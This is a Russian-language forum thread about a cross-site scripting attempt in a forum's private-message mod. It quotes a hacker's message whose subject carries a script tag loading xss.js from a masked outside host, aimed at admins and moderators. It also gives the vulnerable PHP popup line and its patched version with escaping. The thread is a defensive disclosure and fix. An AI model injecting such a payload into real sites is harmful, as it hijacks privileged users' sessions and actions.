Быстрый лёгкий надёжный форумный движок
Вы не вошли.
Страницы 1
Тема закрыта
Некий хакер прислал такое ЛС:
Тема:
<script src=http://*/sf/xss.js></script>Насчёт модерства
Сообщение:
Здравствуйте, <*>.
У меня следующий вопрос к Вам - могу ли я стать модератором раздела "Дизайн и CSS" и что для этого нужно?
звездочками я заменил конкретный текст. на этом форуме такие финты не проходят, но если у кого-то старый мод PMS, возможно Javascript со злобного сайта выполнится. В результате от вашего имени может быть выполнено какое-то действие на форуме. Рассылаются такие письма Админам и Модерам - то есть людям с полномочиями.
Чтобы такого не произошло - следите за обновлениями модов и закрывайте дырки!
artoodetoo
к сожалению на этом форуме это проходит, у тех у кого включен поп-ап. исправление:
message_popup.php, строка 98:
<p><?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?></p>
заменить на:
<p><?php echo $lang_pms['Popup new'], pun_htmlspecialchars($return['sender']), $lang_pms['Popup subj'], pun_htmlspecialchars($return['subject']) ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?></p>
Писал об этом пол года назад!
Уязвимость в Приватных сообщениях.
FedKoFF
действительно, куда мои глаза глядели?
Private Message Mod - hcs edition
6. Устранена мелкая дырка в защите -можно только этот пункт подробнее?
Страницы 1
Тема закрыта